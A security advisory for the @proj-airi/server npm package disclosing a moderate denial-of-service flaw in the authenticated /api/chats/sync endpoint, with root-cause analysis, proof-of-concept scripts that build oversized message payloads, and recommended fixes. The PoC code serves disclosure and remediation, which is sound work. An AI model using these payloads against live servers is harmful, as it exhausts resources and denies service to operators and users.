
Resource exhaustion (DoS) of `/api/chats/sync` with authenticated unbounded payload

Moderate
nekomeowww published GHSA-h2xc-w722-j227 Mar 23, 2026

Package

npm @proj-airi/server (npm)

Affected versions

>= 0.8.2

Patched versions

0.8.5

Description

Summary (one paragraph)

@proj-airi exposes an authenticated endpoint POST /api/chats/sync that accepts a JSON body containing an unbounded messages array with unbounded content strings. The handler parses the full JSON body in memory and then performs per-message database reads/writes inside a transaction. An authenticated attacker can submit an oversized request (or many moderately large requests) to cause high CPU usage, high memory usage, and heavy database load, leading to denial of service (slowdown and/or OOM).

Vulnerability details

Root causes

  1. No request size limits in schema (valibot)
  • File: apps/server/src/api/chats.schema.ts
  • messages: array(ChatSyncMessageSchema) is unbounded.
  • content: string() is unbounded.
  • chat.id, chat.title, and message.id are unbounded strings as well.
  2. No server-side body size limit / streaming guard
  • File: apps/server/src/routes/chats.ts
  • The handler calls await c.req.json() and then validates, meaning the full payload must be read and parsed before rejection.
  3. Per-message DB lookup and write in a loop
  • File: apps/server/src/services/chats.ts
  • For each message, the service does a findFirst by message id and then an insert or update.
  • This makes processing O(n) database operations for n messages (and in practice it can be worse depending on indexes/IO).
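The loop in root cause 3 can be sketched as follows. The interfaces here are hypothetical stand-ins for the drizzle-orm calls in apps/server/src/services/chats.ts, not the actual service code; the point is the query pattern, not the exact API:

```typescript
// Hypothetical shape of the per-message loop described above: one read plus
// one write per message means O(n) database round trips per request, all
// inside a single transaction.
interface SyncMessage {
  id: string
  role: string
  content: string
  createdAt: number
}

interface MessageDb {
  findMessageById: (id: string) => Promise<unknown>
  insertMessage: (message: SyncMessage) => Promise<void>
  updateMessage: (message: SyncMessage) => Promise<void>
}

async function syncMessagesSketch(db: MessageDb, messages: SyncMessage[]) {
  for (const message of messages) {
    // findFirst-style lookup: one query per message
    const existing = await db.findMessageById(message.id)
    if (existing)
      await db.updateMessage(message) // one write per message
    else
      await db.insertMessage(message)
  }
}
```

Since nothing bounds `messages.length`, the attacker controls n directly, and the transaction holds its connection for the full duration of the loop.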

Proof of Concept

PoC A: in-repo script that exercises validation + DB writes

This PoC uses the current schema and the current syncChat implementation with an in-memory Postgres-compatible DB (PGlite) and demonstrates that large message batches cause significant server-side work.

import { performance } from 'node:perf_hooks'
import { createRequire } from 'node:module'

import { PGlite } from '@electric-sql/pglite'
import { vector } from '@electric-sql/pglite/vector'
import { sql } from 'drizzle-orm'
import { drizzle } from 'drizzle-orm/pglite'
import { safeParse } from 'valibot'

import { ChatSyncSchema } from '../api/chats.schema'
import * as chatSchema from '../schemas/chats'
import { createChatService } from '../services/chats'

function formatBytes(bytes: number) {
  const units = ['B', 'KB', 'MB', 'GB'] as const
  let value = bytes
  let unit = 0
  while (value >= 1024 && unit < units.length - 1) {
    value /= 1024
    unit += 1
  }
  return `${value.toFixed(2)} ${units[unit]}`
}

function makePayload(messageCount: number, contentBytes: number) {
  const content = 'A'.repeat(contentBytes)
  const createdAt = Date.now()

  return {
    chat: {
      id: 'poc-chat',
      type: 'group' as const,
      title: 'poc',
      createdAt,
      updatedAt: createdAt,
    },
    members: [
      { type: 'character' as const, characterId: 'default' },
    ],
    messages: Array.from({ length: messageCount }, (_, i) => ({
      id: `m-${i}`,
      role: 'user' as const,
      content,
      createdAt,
    })),
  }
}

async function createInMemoryDB(schema: Record<string, any>) {
  const require = createRequire(import.meta.url)
  // drizzle-kit is CJS; require() avoids ESM interop issues
  const { pushSchema } = require('drizzle-kit/api') as typeof import('drizzle-kit/api')

  const client = new PGlite({
    extensions: { vector },
  })

  const db = drizzle(client, { schema }) as any
  await db.execute(sql`CREATE EXTENSION IF NOT EXISTS vector;`)

  const { apply } = await pushSchema(schema, db)
  await apply()

  return db
}

async function main() {
  const messageCount = Number(process.env.MESSAGE_COUNT ?? '5000')
  const contentBytes = Number(process.env.CONTENT_BYTES ?? '2048')
  const userId = process.env.USER_ID ?? 'poc-user'

  console.log(JSON.stringify({ messageCount, contentBytes, totalContentApprox: formatBytes(messageCount * contentBytes) }))

  const payload = makePayload(messageCount, contentBytes)

  const mem0 = process.memoryUsage().heapUsed
  const t0 = performance.now()
  const parsed = safeParse(ChatSyncSchema, payload)
  const t1 = performance.now()
  const mem1 = process.memoryUsage().heapUsed

  if (!parsed.success) {
    console.error('Schema rejected payload:', parsed.issues)
    process.exitCode = 2
    return
  }

  console.log(`safeParse(ChatSyncSchema): ${(t1 - t0).toFixed(1)} ms, heap +${formatBytes(mem1 - mem0)}`)

  const db = await createInMemoryDB(chatSchema)
  const chatService = createChatService(db)

  const t2 = performance.now()
  const res = await chatService.syncChat(userId, parsed.output)
  const t3 = performance.now()

  console.log(`chatService.syncChat: ${(t3 - t2).toFixed(1)} ms, result: ${JSON.stringify(res)}`)
}

// eslint-disable-next-line antfu/no-top-level-await
await main()

Run:

# ~10 MiB total message content (5000 * 2048 bytes)
MESSAGE_COUNT=5000 CONTENT_BYTES=2048 pnpm -C apps/server run apply:env -- tsx src/scripts/poc-chat-sync-dos.ts

# ~20 MiB total message content (20000 * 1024 bytes)
MESSAGE_COUNT=20000 CONTENT_BYTES=1024 pnpm -C apps/server run apply:env -- tsx src/scripts/poc-chat-sync-dos.ts

Observed (representative) results on my machine:

  • MESSAGE_COUNT=5000, CONTENT_BYTES=2048: syncChat ~ 2.2 s
  • MESSAGE_COUNT=20000, CONTENT_BYTES=1024: syncChat ~ 8.4 s

In production (real network, JSON parsing overhead, real Postgres IO, concurrent requests) the impact will generally be worse.

PoC B: HTTP request shape (authenticated)

The HTTP body shape that triggers the issue:

{
  "chat": { "id": "any-string", "type": "group", "title": "optional", "createdAt": 0, "updatedAt": 0 },
  "members": [{ "type": "character", "characterId": "default" }],
  "messages": [
    { "id": "m-0", "role": "user", "content": "....very large....", "createdAt": 0 }
  ]
}

Increasing messages.length and messages[i].content.length increases server work and resource usage.
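A client-side reproduction of this request shape can be sketched with fetch. BASE_URL, TOKEN, and the Bearer authorization scheme are placeholders; adapt them to the actual deployment and auth mechanism:

```typescript
// Hypothetical client sketch for PoC B. Only the endpoint path and body shape
// come from the advisory; BASE_URL, TOKEN, and the Bearer scheme are
// placeholders for the real deployment.
function makeOversizedBody(messageCount: number, contentBytes: number): string {
  const content = 'A'.repeat(contentBytes)
  return JSON.stringify({
    chat: { id: 'any-string', type: 'group', title: 'optional', createdAt: 0, updatedAt: 0 },
    members: [{ type: 'character', characterId: 'default' }],
    messages: Array.from({ length: messageCount }, (_, i) => ({
      id: `m-${i}`,
      role: 'user',
      content,
      createdAt: 0,
    })),
  })
}

async function sendSync(baseUrl: string, token: string, body: string): Promise<number> {
  const res = await fetch(`${baseUrl}/api/chats/sync`, {
    method: 'POST',
    headers: {
      'content-type': 'application/json',
      'authorization': `Bearer ${token}`, // placeholder auth scheme
    },
    body,
  })
  return res.status
}

// ~20 MiB of message content, mirroring the second run in PoC A
if (process.env.RUN_POC) {
  sendSync(
    process.env.BASE_URL ?? 'http://localhost:3000',
    process.env.TOKEN ?? '',
    makeOversizedBody(20000, 1024),
  ).then(status => console.log(`status: ${status}`))
}
```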

Recommendations / fixes

  • Enforce body size limits at the HTTP layer for /api/* (or at least /api/chats/sync). If using Hono, add a strict body size limit middleware before c.req.json().
  • Add schema bounds in ChatSyncSchema (in valibot, maxLength applies to both strings and arrays):
    • messages: maxLength(...) (e.g., 100–1000 depending on expected use)
    • content: maxLength(...) (e.g., 10k–100k characters)
    • id/title: maxLength(...)
  • Avoid per-message findFirst:
    • Use bulk upsert / batch insert.
    • Or prefetch existing IDs in a single query, then insert/update in batches.
  • Rate limit the endpoint by user/session and/or IP.
  • Consider quotas (e.g., max messages per chat per day, max bytes).
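The batched alternative suggested above can be sketched as follows. The BatchDb interface is a hypothetical stand-in for the drizzle-orm queries the real service would use, not the shipped fix:

```typescript
// Hedged sketch: prefetch existing message IDs in a single query, then do one
// bulk insert and one batched update, instead of a findFirst per message.
interface SyncMessage {
  id: string
  role: string
  content: string
  createdAt: number
}

interface BatchDb {
  selectExistingIds: (ids: string[]) => Promise<Set<string>> // one SELECT ... WHERE id IN (...)
  insertMany: (rows: SyncMessage[]) => Promise<void>         // one bulk INSERT
  updateMany: (rows: SyncMessage[]) => Promise<void>         // one batched UPDATE
}

async function syncMessagesBatched(db: BatchDb, messages: SyncMessage[]) {
  if (messages.length === 0)
    return { inserted: 0, updated: 0 }

  // At most three queries total, regardless of how many messages arrive.
  const existing = await db.selectExistingIds(messages.map(m => m.id))
  const toInsert = messages.filter(m => !existing.has(m.id))
  const toUpdate = messages.filter(m => existing.has(m.id))

  if (toInsert.length > 0)
    await db.insertMany(toInsert)
  if (toUpdate.length > 0)
    await db.updateMany(toUpdate)

  return { inserted: toInsert.length, updated: toUpdate.length }
}
```

Combined with a bound on the messages array in the schema, this keeps per-request database work constant in query count and bounded in total size.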

Severity

Moderate

CVSS overall score

4.9 / 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
High
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
High

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H

CVE ID

No known CVE

Weaknesses

No CWEs

Credits